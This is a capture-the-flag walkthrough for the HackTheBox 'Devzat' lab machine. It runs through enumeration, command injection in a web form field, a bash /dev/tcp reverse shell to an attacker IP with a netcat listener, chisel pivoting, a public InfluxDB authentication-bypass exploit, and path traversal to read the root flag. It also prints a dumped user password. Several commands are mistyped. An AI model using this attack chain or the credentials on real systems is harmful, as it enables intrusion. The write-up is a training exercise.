/Devzat-HTB-HackTheBox-Walkthrough

Devzat HackTheBox Writeups

Devzat - HackTheBox Walkthrough

Devzat jpeg

CONTENT :

  1. Connecting to HTB machine
  2. Nmap scanning
  3. Adding to localhost
  4. Fuff scanning
  5. Git source code enumeration
  6. Using Wireshark
  7. Getting reverse shell
  8. Using burpsuite
  9. Pivoting
  10. InfluxDB exploitation
  11. Switching to Catherine
  12. Root flag captured

1. CONNECTING TO HTB [via VPN]:

First of all, we need to connect to the HTB machine using a VPN that is downloaded from HTB.
My VPN:lab_dracula2001.ovpn
command: Openvpn lab_dracula2001.ovpn [command used to connect the VPN]

Machine IP 10.10.11.118

devzat 1

2. Nmap Scanning [ for open ports]:

Nmap tool is used to scan the open ports.
commands: nmap -sC -sV -A -Pn 10.10.11.118

nmap

Nmap scan result: Port 22, Port 80, Port 8000, apache service is running on port 80, so here we get to know that there is a webpage running.

3. Adding to localhost :

But here we need to add this to our local host otherwise we can't view the website.
Command: nano /etc/hosts [ this is used to add hosts]

localhost

After setting up localhost we will be able to view the website.

website

Gobuster scanning:

I tried using gobuster scan and didn't get the result , so just move on to vhost scanning using ffuf
command : gobuster dir -u http://10.10.11.118:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium [gobuster dir - u (URL of website) - w (wordlist)]

gobuster

4. Fuff scanning :

command:fuff - w /usr/share/seclists/Discovery/DNS/subdomains-topmillion- 5000.txt -mc 200 -c -u https://devzat.htb/ -H "HOST: FUZZ.devzat.htb"
After scanning, we get to know that vhost pets (website) and need to add this to the localhost file.

hosts

scanning web directory pets.devzat.htb:
Command : ffuf -u http: //pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content-raft-small- words.txt -fs 510

5. Git source code enumeration :

Here we needed to go through each directory to find the git file and download it.
Command : wget -r -np -R "index.html" http://pets.devzat.htb/.git
and filename is pets.devzat.htb

git downlad

After downloading, go through the directories and check for the git status using the command git status :

git status

And here many files have been deleted, so we need to restore them.
the command used to restore: git restore .

git restore

Here let's go through the file called main.go
command : cat main.go [ command used to view the content inside the file]

main go main go2

After going through the file, we get to know that the website pets.devzat.htb has command injection vulnerable [ command injection is possible in species]

6. Using Wireshark :

Wireshark result to show vulnerable by capturing the icmp echos

wireshark

7. Getting reverse shell :

For gaining access to reverse shell, we need to make a payload using the following command.
Command : echo -n 'bash -I>&/dev/tcp/10.10.14.84/9001 0>&1' | base64

geting rev

8. Using Burpsuite:

Now using the burpsuite to intercept the web request.

burp1

To intercept the web request, we need to turn on the "intercept is on " in proxy option, on the burpsuite application. After that go to the website and turn on proxy.

proxy

burp2

Here we got intercepting result and place the payload in species section as shown below :

brup innter

After adding payload start-up the listner.
Command : nc -lnvp 9001

nc lv

Now we got the reverse shell access. After getting reverse shell, checks for the system id which shows the results as :
Command: id

id command

9. Pivoting :

Here we use chisel tool to port forward back to the attackers machine.chisel is downloaded and configured from Github to our machine and then it is transferred to devzat by using python server.

pvoit 1 pvoit 2

Chisel on devtaz machine:

pvoit 3

After port forwarding, we have to run a nmap scan.

Command : nmap -p 8086 -sV 127.0.0.1

influx

10. InfluxDB exploitation:

After doing nmap scan we get to know that influxDb service is running on port 8086, so now we have to search for it exploits.

URL of github (exploit) : https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE- 2019–20933

Command : git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE- 2019–20933

Download it and give permission

Command : chmod +x__ main__.py
pip install -r requirements.txt

install pip req

After doing these steps start the influxDB exploit.

Command: python3___main__.py

main py

List the table using.

Command: SHOW MEASUREMENTS

main 2 py

After that dump user.

Command: *select from "user"

passw

User: catherine
Password: woBeeYareedahc7Oogeephies7Aiseci

Now we got the password of Catherine's user, so we can log in as Catherine's user.

11. Switching to Catherine user :

Command: *su Catherine

       cat user.txt* [ to view the user flag]

cat

User flag:

flag

Here we got a zip files named devzat-dev.zip and devzat-main.zip so we need to unzip it into /tmp directory

Command : cp devzat-dev.zip /tmp

dev

From the diff command, the "dev" environment implements the file reading function using the file command with password protection. The "dev" environment is running on localhost port 8443, hence from the initial enumeration using Patrick account unable to check the process running 8443.

Command: diff dev/commands.go main/commands.go

diff

Now, need to download chisel in Catherine user for port forwarding

chisel in cat

after downloading we need to give permission to chisel file.

Command : chmod +x chisel_1.7.3_linux_amd64

chmod

Now we need to do port forwarding from here to our own machine by using the tool we previously used (chisel) and ssh port will be 8443.

chisel port

Command : ssh -l test 127.0.0.1 -p 8443

ssh

12. Root flag capturing:

Command : /file ../root.txt CeilingCatStillAThingin2021?

Finally, the system is PWNED !!